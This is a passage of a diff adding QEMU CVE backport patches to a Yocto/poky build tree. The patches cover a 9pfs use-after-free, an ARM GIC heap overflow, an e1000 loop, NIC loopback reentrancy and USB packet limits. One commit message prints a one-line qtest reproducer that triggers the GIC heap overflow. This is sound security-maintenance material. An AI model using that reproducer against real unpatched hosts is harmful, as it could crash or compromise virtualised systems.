transmitted to the backend. This is achieved +by keeping a reference on the first fid (head) before traversing +the list. + +This is wrong in several ways: +- a potential clunk request from the client could tear the first + fid down and cause the reference to be stale. This leads to a + use-after-free error that can be detected with ASAN, using a + custom 9p client +- fids are added at the head of the list : restarting from the + previous head will always miss fids added by a some other + potential request + +All these problems could be avoided if fids were being added at the +end of the list. This can be achieved with a QSIMPLEQ, but this is +probably too much change for a bug fix. For now let's keep it +simple and just restart the loop from the current head. + +Fixes: CVE-2021-20181 +Buglink: https://bugs.launchpad.net/qemu/+bug/1911666 +Reported-by: Zero Day Initiative +Reviewed-by: Christian Schoenebeck +Reviewed-by: Stefano Stabellini +Message-Id: <161064025265.1838153.15185571283519390907.stgit@bahia.lan> +Signed-off-by: Greg Kurz + +Upstream-Status: Backport [89fbea8737e8f7b954745a1ffc4238d377055305] +CVE: CVE-2021-20181 + +Signed-off-by: Sakib Sajal +--- + hw/9pfs/9p.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c +index 94df440fc..6026b51a1 100644 +--- a/hw/9pfs/9p.c ++++ b/hw/9pfs/9p.c +@@ -502,9 +502,9 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path) + { + int err; + V9fsState *s = pdu->s; +- V9fsFidState *fidp, head_fid; ++ V9fsFidState *fidp; + +- head_fid.next = s->fid_list; ++again: + for (fidp = s->fid_list; fidp; fidp = fidp->next) { + if (fidp->path.size != path->size) { + continue; +@@ -524,7 +524,7 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path) + * switched to the worker thread + */ + if (err == 0) { +- fidp = &head_fid; ++ goto again; + } + } + } +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch new file mode 100644 index 0000000000..46c9ab4184 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch @@ -0,0 +1,67 @@ +From edfe2eb4360cde4ed5d95bda7777edcb3510f76a Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= +Date: Sun, 31 Jan 2021 11:34:01 +0100 +Subject: [PATCH] hw/intc/arm_gic: Fix interrupt ID in GICD_SGIR register +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Per the ARM Generic Interrupt Controller Architecture specification +(document "ARM IHI 0048B.b (ID072613)"), the SGIINTID field is 4 bit, +not 10: + + - 4.3 Distributor register descriptions + - 4.3.15 Software Generated Interrupt Register, GICD_SG + + - Table 4-21 GICD_SGIR bit assignments + + The Interrupt ID of the SGI to forward to the specified CPU + interfaces. The value of this field is the Interrupt ID, in + the range 0-15, for example a value of 0b0011 specifies + Interrupt ID 3. + +Correct the irq mask to fix an undefined behavior (which eventually +lead to a heap-buffer-overflow, see [Buglink]): + + $ echo 'writel 0x8000f00 0xff4affb0' | qemu-system-aarch64 -M virt,accel=qtest -qtest stdio + [I 1612088147.116987] OPENED + [R +0.278293] writel 0x8000f00 0xff4affb0 + ../hw/intc/arm_gic.c:1498:13: runtime error: index 944 out of bounds for type 'uint8_t [16][8]' + SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ../hw/intc/arm_gic.c:1498:13 + +This fixes a security issue when running with KVM on Arm with +kernel-irqchip=off. (The default is kernel-irqchip=on, which is +unaffected, and which is also the correct choice for performance.) + +Cc: qemu-stable@nongnu.org +Fixes: CVE-2021-20221 +Fixes: 9ee6e8bb853 ("ARMv7 support.") +Buglink: https://bugs.launchpad.net/qemu/+bug/1913916 +Buglink: https://bugs.launchpad.net/qemu/+bug/1913917 +Reported-by: Alexander Bulekov +Signed-off-by: Philippe Mathieu-Daudé +Message-id: 20210131103401.217160-1-f4bug@amsat.org +Reviewed-by: Peter Maydell +Signed-off-by: Peter Maydell + +Upstream-Status: Backport +CVE: CVE-2021-20221 +Signed-off-by: Armin Kuster + +--- + hw/intc/arm_gic.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/intc/arm_gic.c +=================================================================== +--- qemu-4.2.0.orig/hw/intc/arm_gic.c ++++ qemu-4.2.0/hw/intc/arm_gic.c +@@ -1455,7 +1455,7 @@ static void gic_dist_writel(void *opaque + int target_cpu; + + cpu = gic_get_current_cpu(s); +- irq = value & 0x3ff; ++ irq = value & 0xf; + switch ((value >> 24) & 3) { + case 0: + mask = (value >> 16) & ALL_CPU_MASK; diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch new file mode 100644 index 0000000000..7175b24e99 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch @@ -0,0 +1,55 @@ +From affdf476543405045c281a7c67d1eaedbcea8135 Mon Sep 17 00:00:00 2001 +From: Jason Wang +Date: Wed, 24 Feb 2021 13:45:28 +0800 +Subject: [PATCH] e1000: fail early for evil descriptor + +During procss_tx_desc(), driver can try to chain data descriptor with +legacy descriptor, when will lead underflow for the following +calculation in process_tx_desc() for bytes: + + if (tp->size + bytes > msh) + bytes = msh - tp->size; + +This will lead a infinite loop. So check and fail early if tp->size if +greater or equal to msh. + +Reported-by: Alexander Bulekov +Reported-by: Cheolwoo Myung +Reported-by: Ruhr-University Bochum +Cc: Prasad J Pandit +Cc: qemu-stable@nongnu.org +Signed-off-by: Jason Wang + +Upstream-Status: Backport [3de46e6fc489c52c9431a8a832ad8170a7569bd8] +CVE: CVE-2021-20257 + +Signed-off-by: Sakib Sajal +--- + hw/net/e1000.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/hw/net/e1000.c b/hw/net/e1000.c +index cf22c4f07..c3564c7ce 100644 +--- a/hw/net/e1000.c ++++ b/hw/net/e1000.c +@@ -670,6 +670,9 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp) + msh = tp->tso_props.hdr_len + tp->tso_props.mss; + do { + bytes = split_size; ++ if (tp->size >= msh) { ++ goto eop; ++ } + if (tp->size + bytes > msh) + bytes = msh - tp->size; + +@@ -695,6 +698,7 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp) + tp->size += split_size; + } + ++eop: + if (!(txd_lower & E1000_TXD_CMD_EOP)) + return; + if (!(tp->cptse && tp->size < tp->tso_props.hdr_len)) { +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch new file mode 100644 index 0000000000..5bacd67481 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch @@ -0,0 +1,177 @@ +From 4b1988a29d67277d6c8ce1df52975f5616592913 Mon Sep 17 00:00:00 2001 +From: Jason Wang +Date: Wed, 24 Feb 2021 11:44:36 +0800 +Subject: [PATCH 01/10] net: introduce qemu_receive_packet() +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Some NIC supports loopback mode and this is done by calling +nc->info->receive() directly which in fact suppresses the effort of +reentrancy check that is done in qemu_net_queue_send(). + +Unfortunately we can't use qemu_net_queue_send() here since for +loopback there's no sender as peer, so this patch introduce a +qemu_receive_packet() which is used for implementing loopback mode +for a NIC with this check. + +NIC that supports loopback mode will be converted to this helper. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit +Reviewed-by: Philippe Mathieu-Daudé +Cc: qemu-stable@nongnu.org +Signed-off-by: Jason Wang + +Upstream-Status: Backport [705df5466c98f3efdd2b68d3b31dad86858acad7] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal +--- + include/net/net.h | 5 +++++ + include/net/queue.h | 8 ++++++++ + net/net.c | 38 +++++++++++++++++++++++++++++++------- + net/queue.c | 22 ++++++++++++++++++++++ + 4 files changed, 66 insertions(+), 7 deletions(-) + +diff --git a/include/net/net.h b/include/net/net.h +index 778fc787c..03f058ecb 100644 +--- a/include/net/net.h ++++ b/include/net/net.h +@@ -143,12 +143,17 @@ void *qemu_get_nic_opaque(NetClientState *nc); + void qemu_del_net_client(NetClientState *nc); + typedef void (*qemu_nic_foreach)(NICState *nic, void *opaque); + void qemu_foreach_nic(qemu_nic_foreach func, void *opaque); ++int qemu_can_receive_packet(NetClientState *nc); + int qemu_can_send_packet(NetClientState *nc); + ssize_t qemu_sendv_packet(NetClientState *nc, const struct iovec *iov, + int iovcnt); + ssize_t qemu_sendv_packet_async(NetClientState *nc, const struct iovec *iov, + int iovcnt, NetPacketSent *sent_cb); + ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size); ++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size); ++ssize_t qemu_receive_packet_iov(NetClientState *nc, ++ const struct iovec *iov, ++ int iovcnt); + ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size); + ssize_t qemu_send_packet_async(NetClientState *nc, const uint8_t *buf, + int size, NetPacketSent *sent_cb); +diff --git a/include/net/queue.h b/include/net/queue.h +index c0269bb1d..9f2f289d7 100644 +--- a/include/net/queue.h ++++ b/include/net/queue.h +@@ -55,6 +55,14 @@ void qemu_net_queue_append_iov(NetQueue *queue, + + void qemu_del_net_queue(NetQueue *queue); + ++ssize_t qemu_net_queue_receive(NetQueue *queue, ++ const uint8_t *data, ++ size_t size); ++ ++ssize_t qemu_net_queue_receive_iov(NetQueue *queue, ++ const struct iovec *iov, ++ int iovcnt); ++ + ssize_t qemu_net_queue_send(NetQueue *queue, + NetClientState *sender, + unsigned flags, +diff --git a/net/net.c b/net/net.c +index 6a2c3d956..5e15e5d27 100644 +--- a/net/net.c ++++ b/net/net.c +@@ -528,6 +528,17 @@ int qemu_set_vnet_be(NetClientState *nc, bool is_be) + #endif + } + ++int qemu_can_receive_packet(NetClientState *nc) ++{ ++ if (nc->receive_disabled) { ++ return 0; ++ } else if (nc->info->can_receive && ++ !nc->info->can_receive(nc)) { ++ return 0; ++ } ++ return 1; ++} ++ + int qemu_can_send_packet(NetClientState *sender) + { + int vm_running = runstate_is_running(); +@@ -540,13 +551,7 @@ int qemu_can_send_packet(NetClientState *sender) + return 1; + } + +- if (sender->peer->receive_disabled) { +- return 0; +- } else if (sender->peer->info->can_receive && +- !sender->peer->info->can_receive(sender->peer)) { +- return 0; +- } +- return 1; ++ return qemu_can_receive_packet(sender->peer); + } + + static ssize_t filter_receive_iov(NetClientState *nc, +@@ -679,6 +684,25 @@ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size) + return qemu_send_packet_async(nc, buf, size, NULL); + } + ++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size) ++{ ++ if (!qemu_can_receive_packet(nc)) { ++ return 0; ++ } ++ ++ return qemu_net_queue_receive(nc->incoming_queue, buf, size); ++} ++ ++ssize_t qemu_receive_packet_iov(NetClientState *nc, const struct iovec *iov, ++ int iovcnt) ++{ ++ if (!qemu_can_receive_packet(nc)) { ++ return 0; ++ } ++ ++ return qemu_net_queue_receive_iov(nc->incoming_queue, iov, iovcnt); ++} ++ + ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size) + { + return qemu_send_packet_async_with_flags(nc, QEMU_NET_PACKET_FLAG_RAW, +diff --git a/net/queue.c b/net/queue.c +index 19e32c80f..c872d51df 100644 +--- a/net/queue.c ++++ b/net/queue.c +@@ -182,6 +182,28 @@ static ssize_t qemu_net_queue_deliver_iov(NetQueue *queue, + return ret; + } + ++ssize_t qemu_net_queue_receive(NetQueue *queue, ++ const uint8_t *data, ++ size_t size) ++{ ++ if (queue->delivering) { ++ return 0; ++ } ++ ++ return qemu_net_queue_deliver(queue, NULL, 0, data, size); ++} ++ ++ssize_t qemu_net_queue_receive_iov(NetQueue *queue, ++ const struct iovec *iov, ++ int iovcnt) ++{ ++ if (queue->delivering) { ++ return 0; ++ } ++ ++ return qemu_net_queue_deliver_iov(queue, NULL, 0, iov, iovcnt); ++} ++ + ssize_t qemu_net_queue_send(NetQueue *queue, + NetClientState *sender, + unsigned flags, +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch new file mode 100644 index 0000000000..fdb4894e44 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch @@ -0,0 +1,41 @@ +From 65b851efd3d0280425c202f4e5880c48f8334dae Mon Sep 17 00:00:00 2001 +From: Alexander Bulekov +Date: Mon, 1 Mar 2021 14:35:30 -0500 +Subject: [PATCH 10/10] lan9118: switch to use qemu_receive_packet() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé +Signed-off-by: Jason Wang + +Upstream-Status: Backport [37cee01784ff0df13e5209517e1b3594a5e792d1] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal +--- + hw/net/lan9118.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/net/lan9118.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/lan9118.c ++++ qemu-4.2.0/hw/net/lan9118.c +@@ -667,7 +667,7 @@ static void do_tx_packet(lan9118_state * + /* FIXME: Honor TX disable, and allow queueing of packets. */ + if (s->phy_control & 0x4000) { + /* This assumes the receive routine doesn't touch the VLANClient. */ +- lan9118_receive(qemu_get_queue(s->nic), s->txp->data, s->txp->len); ++ qemu_receive_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len); + } else { + qemu_send_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len); + } diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch new file mode 100644 index 0000000000..5e53e20bac --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch @@ -0,0 +1,42 @@ +From e2a48a3c7cc33dbbe89f896e0f07462cb04ff6b5 Mon Sep 17 00:00:00 2001 +From: Jason Wang +Date: Wed, 24 Feb 2021 12:13:22 +0800 +Subject: [PATCH 02/10] e1000: switch to use qemu_receive_packet() for loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé +Signed-off-by: Jason Wang + +Upstream-Status: Backport [1caff0340f49c93d535c6558a5138d20d475315c] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal +--- + hw/net/e1000.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/net/e1000.c b/hw/net/e1000.c +index d7d05ae30..cf22c4f07 100644 +--- a/hw/net/e1000.c ++++ b/hw/net/e1000.c +@@ -546,7 +546,7 @@ e1000_send_packet(E1000State *s, const uint8_t *buf, int size) + + NetClientState *nc = qemu_get_queue(s->nic); + if (s->phy_reg[PHY_CTRL] & MII_CR_LOOPBACK) { +- nc->info->receive(nc, buf, size); ++ qemu_receive_packet(nc, buf, size); + } else { + qemu_send_packet(nc, buf, size); + } +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch new file mode 100644 index 0000000000..3fc469e3e3 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch @@ -0,0 +1,43 @@ +From c041a4da1ff119715e0ccf2d4a7af62568f17b93 Mon Sep 17 00:00:00 2001 +From: Jason Wang +Date: Wed, 24 Feb 2021 12:57:40 +0800 +Subject: [PATCH 03/10] dp8393x: switch to use qemu_receive_packet() for + loopback packet +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé + +Upstream-Status: Backport [331d2ac9ea307c990dc86e6493e8f0c48d14bb33] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal +--- + hw/net/dp8393x.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/net/dp8393x.c b/hw/net/dp8393x.c +index 205c0decc..533a8304d 100644 +--- a/hw/net/dp8393x.c ++++ b/hw/net/dp8393x.c +@@ -506,7 +506,7 @@ static void dp8393x_do_transmit_packets(dp8393xState *s) + s->regs[SONIC_TCR] |= SONIC_TCR_CRSL; + if (nc->info->can_receive(nc)) { + s->loopback_packet = 1; +- nc->info->receive(nc, s->tx_buffer, tx_len); ++ qemu_receive_packet(nc, s->tx_buffer, tx_len); + } + } else { + /* Transmit packet */ +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch new file mode 100644 index 0000000000..93202ebcef --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch @@ -0,0 +1,42 @@ +From d465dc79c9ee729d91ef086b993e956b1935be69 Mon Sep 17 00:00:00 2001 +From: Jason Wang +Date: Wed, 24 Feb 2021 13:14:35 +0800 +Subject: [PATCH 05/10] sungem: switch to use qemu_receive_packet() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit +Cc: qemu-stable@nongnu.org +Reviewed-by: Mark Cave-Ayland +Reviewed-by: Philippe Mathieu-Daudé +Reviewed-by: Alistair Francis +Signed-off-by: Jason Wang + +Upstream-Status: Backport [8c92060d3c0248bd4d515719a35922cd2391b9b4] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal +--- + hw/net/sungem.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/net/sungem.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/sungem.c ++++ qemu-4.2.0/hw/net/sungem.c +@@ -305,7 +305,7 @@ static void sungem_send_packet(SunGEMSta + NetClientState *nc = qemu_get_queue(s->nic); + + if (s->macregs[MAC_XIFCFG >> 2] & MAC_XIFCFG_LBCK) { +- nc->info->receive(nc, buf, size); ++ qemu_receive_packet(nc, buf, size); + } else { + qemu_send_packet(nc, buf, size); + } diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch new file mode 100644 index 0000000000..40b4bd96e7 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch @@ -0,0 +1,40 @@ +From c0010f9b2bafe866fe32e3c2688454bc24147136 Mon Sep 17 00:00:00 2001 +From: Jason Wang +Date: Wed, 24 Feb 2021 13:27:52 +0800 +Subject: [PATCH 06/10] tx_pkt: switch to use qemu_receive_packet_iov() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_receive_iov() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé +Signed-off-by: Jason Wang + +Upstream-Status: Backport [8c552542b81e56ff532dd27ec6e5328954bdda73] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal +--- + hw/net/net_tx_pkt.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/net/net_tx_pkt.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/net_tx_pkt.c ++++ qemu-4.2.0/hw/net/net_tx_pkt.c +@@ -544,7 +544,7 @@ static inline void net_tx_pkt_sendv(stru + NetClientState *nc, const struct iovec *iov, int iov_cnt) + { + if (pkt->is_loopback) { +- nc->info->receive_iov(nc, iov, iov_cnt); ++ qemu_receive_packet_iov(nc, iov, iov_cnt); + } else { + qemu_sendv_packet(nc, iov, iov_cnt); + } diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch new file mode 100644 index 0000000000..b3b702cca4 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch @@ -0,0 +1,42 @@ +From 64b38675c728354e4015e4bec3d975cd4cb8a981 Mon Sep 17 00:00:00 2001 +From: Alexander Bulekov +Date: Fri, 26 Feb 2021 13:47:53 -0500 +Subject: [PATCH 07/10] rtl8139: switch to use qemu_receive_packet() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit +Cc: qemu-stable@nongnu.org +Buglink: https://bugs.launchpad.net/qemu/+bug/1910826 +Reviewed-by: Philippe Mathieu-Daudé +Signed-off-by: Jason Wang + +Upstream-Status: Backport [5311fb805a4403bba024e83886fa0e7572265de4] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal +--- + hw/net/rtl8139.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/net/rtl8139.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/rtl8139.c ++++ qemu-4.2.0/hw/net/rtl8139.c +@@ -1793,7 +1793,7 @@ static void rtl8139_transfer_frame(RTL81 + } + + DPRINTF("+++ transmit loopback mode\n"); +- rtl8139_do_receive(qemu_get_queue(s->nic), buf, size, do_interrupt); ++ qemu_receive_packet(qemu_get_queue(s->nic), buf, size); + + if (iov) { + g_free(buf2); diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch new file mode 100644 index 0000000000..ed716468dc --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch @@ -0,0 +1,44 @@ +From 023ce62f0a788ad3a8233c7a828554bceeafd031 Mon Sep 17 00:00:00 2001 +From: Alexander Bulekov +Date: Mon, 1 Mar 2021 10:33:34 -0500 +Subject: [PATCH 08/10] pcnet: switch to use qemu_receive_packet() for loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit +Cc: qemu-stable@nongnu.org +Buglink: https://bugs.launchpad.net/qemu/+bug/1917085 +Reviewed-by: Philippe Mathieu-Daudé +Signed-off-by: Jason Wang + +Upstream-Status: Backport [99ccfaa1edafd79f7a3a0ff7b58ae4da7c514928] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal +--- + hw/net/pcnet.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c +index f3f18d859..dcd3fc494 100644 +--- a/hw/net/pcnet.c ++++ b/hw/net/pcnet.c +@@ -1250,7 +1250,7 @@ txagain: + if (BCR_SWSTYLE(s) == 1) + add_crc = !GET_FIELD(tmd.status, TMDS, NOFCS); + s->looptest = add_crc ? PCNET_LOOPTEST_CRC : PCNET_LOOPTEST_NOCRC; +- pcnet_receive(qemu_get_queue(s->nic), s->buffer, s->xmit_pos); ++ qemu_receive_packet(qemu_get_queue(s->nic), s->buffer, s->xmit_pos); + s->looptest = 0; + } else { + if (s->nic) { +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch new file mode 100644 index 0000000000..f4a985604e --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch @@ -0,0 +1,41 @@ +From ecf7e62bb2cb02c9bd40082504ae376f3e19ffd2 Mon Sep 17 00:00:00 2001 +From: Alexander Bulekov +Date: Mon, 1 Mar 2021 14:33:43 -0500 +Subject: [PATCH 09/10] cadence_gem: switch to use qemu_receive_packet() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé +Signed-off-by: Alexander Bulekov +Signed-off-by: Jason Wang + +Upstream-Status: Backport [e73adfbeec9d4e008630c814759052ed945c3fed] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal +--- + hw/net/cadence_gem.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +Index: qemu-4.2.0/hw/net/cadence_gem.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/cadence_gem.c ++++ qemu-4.2.0/hw/net/cadence_gem.c +@@ -1225,7 +1225,7 @@ static void gem_transmit(CadenceGEMState + /* Send the packet somewhere */ + if (s->phy_loop || (s->regs[GEM_NWCTRL] & + GEM_NWCTRL_LOCALLOOP)) { +- gem_receive(qemu_get_queue(s->nic), tx_packet, ++ qemu_receive_packet(qemu_get_queue(s->nic), tx_packet, + total_bytes); + } else { + qemu_send_packet(qemu_get_queue(s->nic), tx_packet, diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch new file mode 100644 index 0000000000..77a5385692 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch @@ -0,0 +1,42 @@ +From 05a40b172e4d691371534828078be47e7fff524c Mon Sep 17 00:00:00 2001 +From: Gerd Hoffmann +Date: Mon, 3 May 2021 15:29:15 +0200 +Subject: [PATCH] usb: limit combined packets to 1 MiB (CVE-2021-3527) + +usb-host and usb-redirect try to batch bulk transfers by combining many +small usb packets into a single, large transfer request, to reduce the +overhead and improve performance. + +This patch adds a size limit of 1 MiB for those combined packets to +restrict the host resources the guest can bind that way. + +Signed-off-by: Gerd Hoffmann +Message-Id: <20210503132915.2335822-6-kraxel@redhat.com> + +Upstream-Status: Backport +https://gitlab.com/qemu-project/qemu/-/commit/05a40b172e4d691371534828078be47e7fff524c +CVE: CVE-2021-3527 +Signed-off-by: Chee Yang Lee + +--- + hw/usb/combined-packet.c | 4 +++- + 1 file changed, 3 insertions(+), 1 deletion(-) + +diff --git a/hw/usb/combined-packet.c b/hw/usb/combined-packet.c +index 5d57e883dc..e56802f89a 100644 +--- a/hw/usb/combined-packet.c ++++ b/hw/usb/combined-packet.c +@@ -171,7 +171,9 @@ void usb_ep_combine_input_packets(USBEndpoint *ep) + if ((p->iov.size % ep->max_packet_size) != 0 || !p->short_not_ok || + next == NULL || + /* Work around for Linux usbfs bulk splitting + migration */ +- (totalsize == (16 * KiB - 36) && p->int_req)) { ++ (totalsize == (16 * KiB - 36) && p->int_req) || ++ /* Next package may grow combined package over 1MiB */ ++ totalsize > 1 * MiB - ep->max_packet_size) { + usb_device_handle_data(ep->dev, first); + assert(first->status == USB_RET_ASYNC); + if (first->combined) { +-- +GitLab + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch new file mode 100644 index 0000000000..6371aced12 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch @@ -0,0 +1,59 @@ +From 7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986 Mon Sep 17 00:00:00 2001 +From: Gerd Hoffmann +Date: Mon, 3 May 2021 15:29:12 +0200 +Subject: [PATCH] usb/redir: avoid dynamic stack allocation (CVE-2021-3527) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Use autofree heap allocation instead. + +Fixes: 4f4321c11ff ("usb: use iovecs in USBPacket") +Reviewed-by: Philippe Mathieu-Daudé +Signed-off-by: Gerd Hoffmann +Tested-by: Philippe Mathieu-Daudé +Message-Id: <20210503132915.2335822-3-kraxel@redhat.com> + +Upstream-Status: Backport +https://gitlab.com/qemu-project/qemu/-/commit/7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986 +CVE: CVE-2021-3527 +Signed-off-by: Chee Yang Lee + +--- + hw/usb/redirect.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c +index 17f06f3417..6a75b0dc4a 100644 +--- a/hw/usb/redirect.c ++++ b/hw/usb/redirect.c +@@ -620,7 +620,7 @@ static void usbredir_handle_iso_data(USBRedirDevice *dev, USBPacket *p, + 